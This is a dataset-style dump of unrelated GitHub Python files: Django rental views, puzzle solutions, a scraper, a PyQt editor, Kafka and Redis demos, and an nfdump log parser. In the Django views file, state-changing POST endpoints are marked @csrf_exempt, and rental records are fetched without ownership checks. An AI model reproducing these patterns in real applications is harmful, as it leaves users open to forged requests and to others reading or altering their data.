{'form': form})\n\n@login_required\n@csrf_exempt\ndef rent_service(request, pk):\n service = get_object_or_404(Service, pk=pk)\n user = request.user\n\n if request.method == 'POST':\n form = RentForm(request.POST)\n if form.is_valid():\n user_rent_service = form.save(commit=False)\n user_rent_service.service = service\n user_rent_service.user = user.username\n days = (user_rent_service.end_date - user_rent_service.start_date).days\n user_rent_service.total_price = days * service.price\n user_rent_service.save()\n service.stock -= 1\n service.save()\n return redirect('servicesApp:service_detail', pk=service.pk)\n else:\n start_date = datetime.date.today()\n end_date = start_date + timedelta(days=7)\n form = RentForm(initial={'start_date': start_date, 'end_date': end_date})\n\n return render(request, 'servicesApp/rent_form.html', {'service': service, 'form': form})\n\n@login_required\ndef rented_services(request):\n today = date.today()\n rented_services = UserRentService.objects.filter(returned=False, end_date__gte=today)\n return render(request, 'servicesApp/rented_services.html', {'rented_services': rented_services})\n\n@login_required\ndef rented_service_detail(request, pk):\n rented_service = get_object_or_404(UserRentService, pk=pk)\n return render(request, 'servicesApp/rented_service_detail.html', {'rented_service': rented_service})\n\n@login_required\ndef return_service(request, pk):\n rented_service = get_object_or_404(UserRentService, pk=pk)\n ReturnRequest.objects.create(rented_service=rented_service)\n return redirect('servicesApp:rented_services')\n\n@login_required\ndef admin_return_requests(request):\n if not request.user.is_staff:\n return redirect('servicesApp:services_list')\n return_requests = ReturnRequest.objects.filter(approved=None)\n return render(request, 'servicesApp/admin_return_requests.html', {'return_requests': return_requests})\n\n@login_required\ndef approve_return_request(request, pk):\n if not request.user.is_staff:\n return redirect('servicesApp:services_list')\n return_request = get_object_or_404(ReturnRequest, pk=pk)\n rented_service = return_request.rented_service\n rented_service.returned = True\n rented_service.service.stock += 1\n rented_service.service.save()\n return_request.approved = True\n return_request.save()\n rented_service.delete() \n return redirect('servicesApp:admin_return_requests')\n\n@login_required\ndef deny_return_request(request, pk):\n if not request.user.is_staff:\n return redirect('servicesApp:services_list')\n return_request = get_object_or_404(ReturnRequest, pk=pk)\n return_request.approved = False\n return_request.save()\n return redirect('servicesApp:admin_return_requests')\n\n@login_required\n@csrf_exempt\ndef sale_service(request, pk):\n service = get_object_or_404(Service, pk=pk)\n if service.stock > 0:\n service.stock -= 1\n service.save()\n return redirect('servicesApp:service_detail', pk=service.pk)\n","repo_name":"Lukas0818/ptua-project","sub_path":"website/servicesApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36667159547","text":"if __name__ == \"__main__\":\n f = open(\"./input.txt\", \"r\")\n input_strings = f.read().splitlines()\n input_lists = [string.replace(\":\", \"\").replace(\"-\", \" \").split(\" \") for string in input_strings]\n input_dicts = [{\n \"min_occurrences\": int(l[0]),\n \"max_occurrences\": int(l[1]),\n \"letter\": l[2],\n \"pwd\": l[3],\n } for l in input_lists]\n\n num_valid = 0\n for d in input_dicts:\n num_occurrences = d[\"pwd\"].count(d[\"letter\"])\n if (num_occurrences <= d[\"max_occurrences\"]) and (num_occurrences >= d[\"min_occurrences\"]):\n num_valid += 1\n\n print(num_valid)\n","repo_name":"mattwedge/AdventOfCode","sub_path":"2020/day2/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25409743666","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom logger import logger\r\n\r\n\r\nclass SingleProjectGitUrlExtractor:\r\n\r\n @staticmethod\r\n def extract(soup):\r\n if not soup:\r\n return\r\n\r\n logger.info('Looking for project children (GIT)')\r\n code_urls = set()\r\n for li in soup.find_all('ul', {'class': 'dropdown'})[0]('li'):\r\n try:\r\n a = li('a')[0]\r\n if a('span')[0].text.startswith('Git'):\r\n href_link = a['href']\r\n if href_link.startswith('/p'):\r\n url = f'https://sourceforge.net/{href_link[1:]}'\r\n\r\n logger.info(f'Found project GIT children on {url}, scrapping')\r\n response = requests.get(url)\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n for link in soup.find_all('div', {'class': 'list card'}):\r\n cleaned_link = link('a')[0]['href']\r\n if cleaned_link.startswith('/p'):\r\n code_urls.add(cleaned_link[1:])\r\n except:\r\n pass\r\n\r\n if code_urls:\r\n logger.info(f'Found project GIT children: {code_urls}')\r\n return code_urls\r\n","repo_name":"Software-Engineering-Jagiellonian/russell-indexer-sourceforge","sub_path":"frege-indexer-sourceforge/single_project_git_url_extractor.py","file_name":"single_project_git_url_extractor.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37420418661","text":"from PyQt6.QtWidgets import QApplication, QMainWindow\nfrom PyQt6 import QtCore\n\nfrom utils.Log import Log\nfrom utils.AppConfig import AppConfig\nfrom utils.Managers import CreateManagers\n\nfrom view.EntityFileView import EntityFileView\nfrom view.EntityLogicsView import EntityLogicsView\nfrom view.EntityTreeView import EntityTreeView\nfrom view.base.MainDockWidget import WrapMainDockWidget\nfrom view.EngineOutputView import EngineOutputView\n\nfrom native.EditorNative import EditorNative\n\nfrom model.AssetsModel import AssetsModel\nfrom model.LogicsModel import LogicsModel\nfrom model.SoundEventsModel import SoundEventsModel\n\nfrom menu.MainFileMenu import MainFileMenu\nfrom menu.MainToolBar import MainToolBar\nfrom menu.MainViewMenu import MainViewMenu\n\nfrom view.main.StatusBar import StatusBar\n\nimport sys\nimport os\n\nclass EditorView(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Editor\")\n self.setMinimumSize(640, 480)\n self.setContentsMargins(1, 1, 1, 1)\n\n self._fileMenu = MainFileMenu(self)\n self._viewMenu = MainViewMenu(self)\n\n self.menuBar().addMenu(self._fileMenu)\n self.menuBar().addMenu(self._viewMenu)\n\n self.addToolBar(MainToolBar())\n self.setStatusBar(StatusBar())\n\n self._engineOutputView = EngineOutputView()\n self.setCentralWidget(self._engineOutputView)\n\n if not self._init():\n sys.exit(1)\n\n CreateManagers(self)\n\n self._openEntityTreeView()\n self._openFileTreeView()\n self._openEntityLogicsView()\n\n def _openEntityTreeView(self):\n self._entityTreeView = EntityTreeView()\n self.addDockWidget(QtCore.Qt.DockWidgetArea.LeftDockWidgetArea, WrapMainDockWidget(self._entityTreeView, \"Entity Tree\"))\n\n def _openFileTreeView(self):\n self._entityFileView = EntityFileView()\n self._entityFileView.setFileTreeModel(self._assetsModel.getEntitiesTree())\n self.addDockWidget(QtCore.Qt.DockWidgetArea.LeftDockWidgetArea, WrapMainDockWidget(self._entityFileView, \"Assets Explorer\"))\n\n def _openEntityLogicsView(self):\n self._entityLogicsView = EntityLogicsView()\n self.addDockWidget(QtCore.Qt.DockWidgetArea.RightDockWidgetArea, WrapMainDockWidget(self._entityLogicsView, \"Entity Logics\"))\n\n def closeEvent(self, event):\n self._deinit()\n return super().closeEvent(event)\n\n def __del__(self):\n self._deinit()\n\n def _init(self):\n self._appConfig = AppConfig()\n self._editorNative = EditorNative(self._appConfig)\n if not self._editorNative.init():\n self._editorNative = None\n Log.error(\"[EditorView:_init] Can't init native editor\")\n return False\n self._assetsModel = AssetsModel(self._appConfig)\n if not self._assetsModel.init():\n Log.error(\"[EditorView:_init] Can't init assets model\")\n return False\n self._logicsModel = LogicsModel(self._editorNative)\n if not self._logicsModel.init():\n Log.error(\"[EditorView:_init] Can't init logics model\")\n return False\n self._soundEventsModel = SoundEventsModel(self._appConfig)\n if not self._soundEventsModel.init():\n Log.error(\"[EditorView:_init] Can't init sound events model\")\n return False\n return True\n\n def _deinit(self):\n if self._editorNative is not None:\n self._editorNative.deinit()\n self._editorNative = None\n\ndef main():\n app = QApplication([])\n app.setStyle(\"windows\")\n editor = EditorView()\n editor.show()\n sys.exit(app.exec())\n\nif __name__ == \"__main__\":\n main()","repo_name":"lastcolour/GamePractice","sub_path":"Sources/Editor/App/Editor.py","file_name":"Editor.py","file_ext":"py","file_size_in_byte":3689,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"36814065826","text":"import time\nimport redis\nfrom flask import Flask\n\napp = Flask(__name__)\ncache = redis.Redis(host='redis', port=6379)\n\ndef get_hit_count():\n retries = 5\n while True:\n try:\n #cache.reset_retry_count()\n return cache.incr('hits')\n except redis.exceptions.connectionError as exc:\n if retries == 0:\n raise exc\n retries -= 1\n time.sleep(0.5)\n\n@app.route('/')\ndef hello():\n count = get_hit_count()\n return 'Hello Etixi! I have been seen {} times.\\n'.format(count)\n\n#### docker compose\n# docker images\n# docker compose up\n# docker compose down\n# docker compose stop\n# docker rm -f image_id\n# docker images","repo_name":"Etixi/MLOPS_Tools_Step_By_Step","sub_path":"Model_Server_And_Application/Docker_Project/DockerCompose/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34854443955","text":"#User function Template for python3\n\nfrom typing import List\n\nclass Solution: \n def eventualSafeNodes(self, V : int, adj : List[List[int]]) -> List[int]:\n # code here\n def dfscheck(node,graph,vis,pathvis,check):\n vis[node]=1\n pathvis[node]=1\n check[node]=0\n for i in graph[node]:\n if not vis[i]:\n if dfscheck(i,graph,vis,pathvis,check)==True:\n check[node]=0\n return True\n elif pathvis[i]:\n check[node]=0\n return True\n check[node]=1\n pathvis[node]=0\n return False\n n=V\n vis=[0]*n\n pathvis=[0]*n\n check=[0]*n\n for i in range(n):\n if not vis[i]:\n dfscheck(i,adj,vis,pathvis,check)\n safenodes=[]\n for i in range(n):\n if check[i]==1:\n safenodes.append(i)\n return safenodes\n \n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__==\"__main__\":\n T = int(input())\n for t in range(T):\n \n V, E = map(int, input().strip().split())\n adj = [[] for i in range(V)]\n for i in range(E):\n u, v = map(int, input().strip().split())\n adj[u].append(v)\n obj = Solution()\n ans = obj.eventualSafeNodes(V, adj)\n for nodes in ans:\n print(nodes, end = ' ')\n print()\n \n\n\n# } Driver Code Ends","repo_name":"Durgaprasad-kakarla/Geeks-for-Geeks","sub_path":"Medium/Eventual Safe States/eventual-safe-states.py","file_name":"eventual-safe-states.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20972628924","text":"from kafka import KafkaProducer\nfrom time import sleep\nimport json\nfrom datetime import datetime\n\nproducer = KafkaProducer(\n bootstrap_servers=['localhost:9092'], api_version=(0, 10, 1))\nproducer.send('tunnel1', json.dumps(\n 'Starting the message queue').encode('utf-8'))\n\nnow = datetime.now()\n\ncurrent_time = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\nfor i in range(10):\n message = \"Message {}\".format(str(datetime.now().time()))\n producer.send('tunnel1', json.dumps(message).encode('utf-8'))\n sleep(2)\n print(\"Message sent \", i+1)\n","repo_name":"LINSANITY03/MessageKafkaPython","sub_path":"messageProducer.py","file_name":"messageProducer.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7834669020","text":"# 60. Permutation Sequence QuestionEditorial Solution My Submissions\n# Total Accepted: 68146\n# Total Submissions: 255846\n# Difficulty: Medium\n# Contributors: Admin\n# \n# By listing and labeling all of the permutations in order,\n# We get the following sequence (ie, for n = 3):\n# \n# \"123\"\n# \"132\"\n# \"213\"\n# \"231\"\n# \"312\"\n# \"321\"\n# Given n and k, return the kth permutation sequence.\n# \n# Note: Given n will be between 1 and 9 inclusive.\n# \n# Subscribe to see which companies asked this question\n\n# 11.27.2016 Rewrite\n# Bug notes: \n# 1. import math for factorial. otherwise write a function\n# 2. k = (k - 1) % tmp + 1\nimport math\nclass Solution(object):\n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n if n <= 0 or k <= 0: return \"\"\n \n res = \"\"\n nums = [ x for x in xrange(1, n+1) ]\n \n while n > 1:\n tmp = math.factorial(n-1) # 2 \n i, k = (k - 1) // tmp, (k - 1) % tmp + 1 # k = (k - 1) % tmp + 1 bug\n res += str(nums[i])\n del nums[i]\n n -= 1\n \n return res + str(nums[0])\n\n\n\n\n\n\n\n\n\n\n\n# Sol 2 TLE\nclass Solution2(object):\n count = 0\n res = \"\"\n resFound = False\n \n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n nums = [ str(x) for x in xrange(1,n+1)]\n self.dfs(\"\", nums, k)\n return self.res\n\n def dfs(self, line, nums, k):\n if self.resFound:\n return \n \n if not nums:\n self.count += 1\n if self.count == k:\n self.res = line\n self.resFound = True\n return \n \n for i in xrange(len(nums)):\n self.dfs(line + nums[i], nums[:i] + nums[i+1:], k)\n\nif __name__ == \"__main__\":\n print(Solution().getPermutation(3, 3))\n print(Solution().getPermutation(4, 14)) #TLE case sol 2\n print(Solution().getPermutation(8, 38790)) #TLE case sol 2\n for x in xrange(1, 16): \n print(Solution2().getPermutation(4, x))\n","repo_name":"yihanc/LC","sub_path":"PY/60_permutation_sequence.py","file_name":"60_permutation_sequence.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72799988908","text":"import matplotlib.pyplot as plt\nimport json\nimport numpy as np\n\nFILE = 'transforms_train.json'\n\ndef plot_coordinate_system(ax, point_3d, scale=1):\n ## Coordinate system axis\n ax.quiver(point_3d[0],point_3d[1],point_3d[2], scale, 0, 0, color=\"r\")\n ax.quiver(point_3d[0],point_3d[1],point_3d[2], 0, scale, 0, color=\"g\")\n ax.quiver(point_3d[0],point_3d[1],point_3d[2], 0, 0, scale, color=\"b\")\n\n # axis label placement\n ax.text(point_3d[0]+scale+0.1, point_3d[1], point_3d[2], r'$x$')\n ax.text(point_3d[0], point_3d[1]+scale+0.1, point_3d[2], r'$y$')\n ax.text(point_3d[0], point_3d[1], point_3d[2]+scale+0.1, r'$z$')\n\ndef plot_coordinate_system_from_matrix(ax, matrix, scale=1):\n\n R = matrix[0:3,0:3]\n t = matrix[0:3,3]\n\n # get rotated axes\n v1 = np.matmul(R,np.array([-scale,0,0]).transpose())\n v2 = np.matmul(R,np.array([0,-scale,0]).transpose())\n v3 = np.matmul(R,np.array([0,0,-scale]).transpose())\n\n ## Coordinate system axis\n ax.quiver(t[0],t[1],t[2], v1[0], v1[1], v1[2], color=\"r\")\n ax.quiver(t[0],t[1],t[2], v2[0], v2[1], v2[2], color=\"g\")\n ax.quiver(t[0],t[1],t[2], v3[0], v3[1], v3[2], color=\"b\")\n\n\ndef create_3d_axes():\n ax=plt.figure().add_subplot(projection='3d')\n\n # if i dont set these, the plot is all zoomed in\n ax.set_xlim([-1,1])\n ax.set_ylim([-1,1])\n ax.set_zlim([-1,1])\n\n ax.set_xlabel(\"X\")\n ax.set_ylabel(\"Y\")\n ax.set_zlabel(\"Z\")\n ax.view_init(30, 45)\n return ax\n\n\nall_poses = []\nwith open(FILE, 'r') as f:\n file = json.load(f)\n for frame in file['frames']:\n all_poses.append(np.array(frame['transform_matrix']))\n\n\nax = create_3d_axes()\nfor pose in all_poses:\n plot_coordinate_system_from_matrix(ax, pose, 0.3)\n\n\n\n\nplt.ioff()\nplt.show()\n","repo_name":"thangible/NeRF-Segmentation","sub_path":"nerf_data/plot_camera_poses.py","file_name":"plot_camera_poses.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16477641616","text":"# This Python program takes the hours and minutes from the user\n# and return the seconds of the parameters passed.\n\nfrom modules import get_seconds\n\n\ndef run():\n welcome_message = open('messages/welcome.txt', 'r')\n final_result = open('messages/result.txt', 'r')\n print(welcome_message.read())\n\n while True:\n user_decision = input(\"Hit enter to continue or type 'exit' to close the program: \")\n if user_decision.lower() == 'exit':\n print('\\nClosing the program...\\n')\n return\n elif user_decision == '':\n break\n else:\n print('Please enter a valid response')\n\n while True:\n hours = input('\\nEnter the hours: ')\n try:\n hours = int(hours)\n except:\n print('Please enter a number')\n continue\n\n if hours < 0 or hours > 24:\n print('Please enter a valid hour')\n else:\n break\n\n while True: \n minutes = input('\\nEnter the minutes: ')\n try:\n minutes = int(minutes)\n except:\n print('Please enter a number')\n continue\n\n if minutes < 1 or minutes > 59:\n print('Please enter a valid quantity of minutes')\n else:\n break\n\n print(final_result.read().format(hours, minutes, get_seconds(hours, minutes)))\n\n\nif __name__ == '__main__':\n\trun()","repo_name":"PascalSalvador/PlatziCodingChallenge","sub_path":"03-clock/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38780388667","text":"# Nikita Akimov\n# interplanety@interplanety.org\n\n# -------------------------------------------------------------------------------\n# DEBUG variables --- For release all must be = False\n# -------------------------------------------------------------------------------\n\n# show errors\nshow_debug_err = False\n\n# no sending content to server (False - send to server, True - not send)\nno_sending_to_server = False\n\n# write storing to server content to file\nto_server_to_file = False\n\n# write loaded from server content to file\nfrom_server_to_file = False\n","repo_name":"Korchy/BIS","sub_path":"cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"15674746487","text":"import re\nimport subprocess\nimport socket\nimport struct\nfrom datetime import datetime, timedelta\nimport config\n\n\"\"\"\nNetflow dump output format\n %ts Start Time - first seen\n %te End Time - last seen\n %td Duration\n %pr Protocol\n %sa Source Address\n %da Destination Address\n %sap Source Address:Port\n %dap Destination Address:Port\n %sp Source Port\n %dp Destination Port\n %sas Source AS\n %das Destination AS\n %in Input Interface num\n %out Output Interface num\n %pkt Packets\n %byt Bytes\n %fl Flows\n %pkt Packets\n %flg TCP Flags\n %tos Tos\n %bps bps - bits per second\n %pps pps - packets per second\n %bpp bps - Bytes per package\n\"\"\"\n\n# Usage: \nclass NetFlow(object):\n\n re_ipv4 = \"^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.\" \\\n \"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.\" \\\n \"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.\" \\\n \"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$\"\n\n def __init__(self):\n pass\n\n def readLog(self, start_datetime, end_datetime, log_interval, \n options=[], file_name=\"\", mode=\"csv\"):\n end_datetime -= timedelta(minutes=log_interval)\n start_date = datetime.strftime(start_datetime.date(), \"%Y-%m-%d\")\n end_date = datetime.strftime(end_datetime.date(), \"%Y-%m-%d\")\n start_datetime = datetime.strftime(start_datetime, \"%Y%m%d%H%M\")\n end_datetime = datetime.strftime(end_datetime, \"%Y%m%d%H%M\")\n log_path = \"%s%s/nfcapd.%s:%s/nfcapd.%s\" % (config.nfs_dir, \\\n start_date, start_datetime, end_date, end_datetime)\n args = ['nfdump', '-R', log_path]\n # options\n args.extend(options)\n # mode\n args.extend([\"-o\", mode])\n\n if file_name == \"\":\n p = subprocess.Popen(args,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = p.communicate()\n return out\n else:\n file_handle = open(file_name, \"w\")\n p = subprocess.Popen(args,\n stdout=file_handle)\n ret_code = p.wait()\n file_handle.flush()\n file_handle.close()\n return \"\"\n\n def readDayLog(self, day, options=[], mode=\"\"):\n day = datetime.strftime(day.date(), \"%Y-%m-%d\")\n log_path = \"%s%s\" % (config.nfs_dir, day)\n args = ['nfdump', '-R', log_path]\n # options\n args.extend(options)\n # mode\n args.extend([\"-o\", mode])\n p = subprocess.Popen(args,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n out, err = p.communicate()\n return out\n\n def parseLogLine(self, plain=\"\", mode=\"csv\"):\n if mode == 'csv':\n log = plain.split(\"\\n\")\n # if we use -a and -L, remove the first line\n # \"Byte limit: > 2000 bytes\"\n if \"limit\" in log[0]:\n log.pop(0)\n head = log[0].split(',')\n\n for line in log[1:-4]:\n if \",\" not in line:\n break\n yield dict(zip(head, line.split(',')))\n\n elif mode == 'pipe':\n head = [\n 'af', # Address Family\n 'tfs', # Time First Seen\n 'mfs', # msec First Seen\n 'tls', # Time First Seen\n 'mls', # msec First Seen\n 'pr', # Protocol\n 'sa', # Source Address\n 'sp', # Source Port\n 'da', # Destination Address\n 'dp', # Destination Port\n 'sas', # Source AS Number\n 'das', # Destination AS Number\n 'in', # Input Interface\n 'out', # Output Interface\n 'flg', # TCP Flag\n 'tos', # Type of Service\n 'pkt', # Packet\n 'byt' # Byte\n ]\n\n for line in plain.split('\\n')[:-5]:\n data = line.split('|')\n if data[0] == '2':\n # IPv4\n data[11:15] = [socket.inet_ntoa(struct.pack('!L', \\\n int(data[14])))]\n data[6:10] = [socket.inet_ntoa(struct.pack('!L', \\\n int(data[9])))]\n elif data[0] == '10':\n # IPv6\n data[11:15] = [socket.inet_ntop(socket.AF_INET6,\n struct.pack('!LLLL', \\\n *(long(i) for i in \\\n data[11:15])))]\n data[6:10] = [socket.inet_ntop(socket.AF_INET6,\n struct.pack('!LLLL', \\\n *(long(i) for i in \\\n data[6:10])))]\n else:\n # Unknown\n data[11:15] = [ \"\".join(data[11:15]) ]\n data[6:10] = [ \"\".join(data[6:10]) ]\n\n yield dict(zip(head, data))\n else:\n head = [i.replace(\"%\",\"\") for i in mode.split(\":\")[1].split(\",\")]\n log = plain.split(\"\\n\")\n\n for line in log:\n if \"Summary\" in line:\n break\n elif \",\" in line:\n body = [i.strip() for i in line.split(',')]\n yield dict(zip(head, body))\n\n def parseSummary(self, plain=\"\", mode=\"csv\"):\n log = plain.split(\"\\n\")\n if mode == 'csv':\n head = log[-3].split(',')\n return dict(zip(head, log[-2].split(',')))\n else:\n head = [\"flows\",\"bytes\",\"packets\"]\n pattern = \"Summary: total flows: ([\\d]+), total bytes: ([\\d]+),\" \\\n \" total packets: ([\\d]+)\"\n result = list(re.findall(pattern, plain)[0])\n return dict(zip(head, result))\n\n def checkIPv4(self, ip=None):\n if ip is not None:\n return re.match(self.re_ipv4, ip)\n","repo_name":"spot5418/CDS","sub_path":"source code/nflow.py","file_name":"nflow.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38780377907","text":"# Nikita Akimov\n# interplanety@interplanety.org\n#\n# GitHub\n# https://github.com/Korchy/BIS\n\n# attribute class\n\n# now newer used, can be used for more logic between node.py and bl_types.py\n\nfrom .bl_types import BlTypes\n\n\nclass Attribute:\n\n @classmethod\n def to_json(cls, attribute, attribute_name):\n attribute_json = {}\n if isinstance(attribute, (int, float, bool, set, str)):\n # attribute = attribute_json\n attribute_json[attribute_name] = attribute\n else:\n print('complex attr', attribute_name, attribute)\n return attribute_json\n\n @classmethod\n def from_json(cls, attribute_name, attribute_owner, attribute_json, attachments_path):\n # fill attribute from json\n if isinstance(getattr(attribute_owner, attribute_name), (int, float, bool, set, str)):\n attribute = attribute_json\n else:\n attribute = BlTypes.from_json(\n instance_name=attribute_name,\n instance_owner=attribute_owner,\n instance_json=attribute_json['instance'][attribute_name],\n attachments_path=attachments_path\n )\n return attribute\n","repo_name":"Korchy/BIS","sub_path":"attribute.py","file_name":"attribute.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"1276239040","text":"from .huffman import HuffmanCoding\r\nimport sys\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tpath = \"data.txt\"\r\n\r\n\twith open(path, 'r') as f:\r\n\t\tlines = f.readlines()\r\n\t\tlines = lines[0].strip('\\n').split(' ')\r\n\t\tlines = [int(n) for n in lines]\r\n\r\n\r\n\tprint(len(lines))\r\n\r\n\t# new_file = open(\"data_bin.bin\", \"wb\")\r\n\t# arr = bytearray(lines)\r\n\t# new_file.write(arr)\r\n\r\n\th = HuffmanCoding(path)\r\n\r\n\toutput_path = h.compress()\r\n\tprint(\"Compressed file path: \" + output_path)\r\n\r\n\tdecom_path = h.decompress(output_path)\r\n\tprint(\"Decompressed file path: \" + decom_path)","repo_name":"unik00/progressive_image_compression","sub_path":"huffman/useHuffman.py","file_name":"useHuffman.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3517686920","text":"from datetime import datetime\n\ndef es_dia_semana(fecha):\n # Obtener el número del día de la semana: lunes = 0, martes = 1, etc.\n dia = fecha.weekday()\n\n if dia < 5:\n return True\n else:\n return False\n\nif es_dia_semana(datetime.now()):\n print(\"Es día de semana... ¡A trabajar!\")\nelse:\n print(\"¡Es fin de semana! ¡Joda\")\n\n","repo_name":"agustincomolli/Python","sub_path":"Programación 102 - Piense como un informático/04_funciones_parametros.py","file_name":"04_funciones_parametros.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74806570988","text":"from django.http import HttpResponse\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.utils.datastructures import MultiValueDict\nfrom django.contrib.auth import authenticate\n\n\nclass HttpResponseNotImplemented(HttpResponse):\n status_code = 501\n\n\nclass HttpResponseUnauthorized(HttpResponse):\n status_code = 401\n\n def __init__(self, realm):\n HttpResponse.__init__(self)\n self['WWW-Authenticate'] = 'Basic realm=\"%s\"' % realm\n\n\ndef parse_distutils_request(request):\n raw_post_data = request.raw_post_data\n sep = raw_post_data.splitlines()[1]\n items = raw_post_data.split(sep)\n post_data = {}\n files = {}\n for part in filter(lambda e: not e.isspace(), items):\n item = part.splitlines()\n if len(item) < 2:\n continue\n header = item[1].replace(\"Content-Disposition: form-data; \", \"\")\n kvpairs = header.split(\";\")\n headers = {}\n for kvpair in kvpairs:\n if not kvpair:\n continue\n key, value = kvpair.split(\"=\")\n headers[key] = value.strip('\"')\n if \"name\" not in headers:\n continue\n content = part[len(\"\\n\".join(item[0:2]))+2:len(part)-1]\n if \"filename\" in headers:\n file = SimpleUploadedFile(headers[\"filename\"], content,\n content_type=\"application/gzip\")\n files[\"distribution\"] = [file]\n elif headers[\"name\"] in post_data:\n post_data[headers[\"name\"]].append(content)\n else:\n # Distutils sends UNKNOWN for empty fields (e.g platform)\n # [russell.sim@gmail.com]\n if content == 'UNKNOWN':\n post_data[headers[\"name\"]] = [None]\n else:\n post_data[headers[\"name\"]] = [content]\n\n return MultiValueDict(post_data), MultiValueDict(files)\n\n\ndef login_basic_auth(request):\n authentication = request.META.get(\"HTTP_AUTHORIZATION\")\n if not authentication:\n return\n (authmeth, auth) = authentication.split(' ', 1)\n if authmeth.lower() != \"basic\":\n return\n auth = auth.strip().decode(\"base64\")\n username, password = auth.split(\":\", 1)\n return authenticate(username=username, password=password)\n","repo_name":"ask/chishop","sub_path":"djangopypi/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":175,"dataset":"github-code","pt":"37"} +{"seq_id":"74140662187","text":"\"\"\"plySimpleLex.py: classe que arrecadará com toda a informação proveniente do PLY-SIMPLE::LEX\"\"\"\n\nimport sys\n\n## lex keys\ntokens_key = \"tokens\"\ndefinedToken_key = \"alreadyDefined\"\nliterals_key = \"literals\"\nignore_key = \"ignore\"\nerror_key = \"error\"\nreturn_key = \"return\"\nregex_key = \"regex\"\nstates_key = \"states\"\n\n## common keys\nlineno_key = \"lineno\"\ncomment_key = \"comment\"\nid_key = \"id\"\npython_key = \"pythonCode\"\n\nclass PlySLexObject:\n\n def __init__(my):\n \n my._idCounter = 1 ## statement id\n\n my._hasLiterals = False ## flag control for literals definition\n my._hasTokens = False ## flag control for tokens definition\n my._hasIgnore = False ## flag control for ignore definition\n my._hasError = False\n my._hasStates = False\n\n my._literals = {}\n my._tokens = {}\n my._ignore = {}\n my._error = {}\n my._returns = []\n my._states = {}\n my._comments = []\n\n my._pythonCode = []\n my._keysOrder = []\n\n def reset(my):\n my._idCounter = 1 ## statement id\n my._hasLiterals = False ## flag control for literals definition\n my._hasTokens = False ## flag control for tokens definition\n my._hasIgnore = False ## flag control for ignore definition\n my._hasError = False\n my._hasStates = False\n my._literals = {}\n my._tokens = {}\n my._ignore = {}\n my._error = {}\n my._returns = []\n my._states = {}\n my._comments = []\n my._pythonCode = []\n my._keysOrder = []\n ##--------------------------------------------------\n ##----------------- Variables gets/sets/deleters ---\n ##--------------------------------------------------\n \n ## literals\n @property\n def literals(my):\n return my._literals\n \n @literals.setter\n def literals(my, value):\n my._literals = value\n \n @literals.deleter\n def literals(my):\n del my._literals\n\n ## varsFullyDefined\n @property\n def varsFullyDefined(my):\n return my._varsFullyDefined\n \n @varsFullyDefined.setter\n def varsFullyDefined(my, value):\n my._varsFullyDefined = value\n \n @varsFullyDefined.deleter\n def varsFullyDefined(my):\n del my._varsFullyDefined\n\n\n ## hasError\n @property\n def hasError(my):\n return my._hasError\n \n @hasError.setter\n def hasError(my, value):\n my._hasError = value\n \n @hasError.deleter\n def hasError(my):\n del my._hasError\n\n ## hasIgnore\n @property\n def hasIgnore(my):\n return my._hasIgnore\n \n @hasIgnore.setter\n def hasIgnore(my, value):\n my._hasIgnore = value\n \n @hasIgnore.deleter\n def hasIgnore(my):\n del 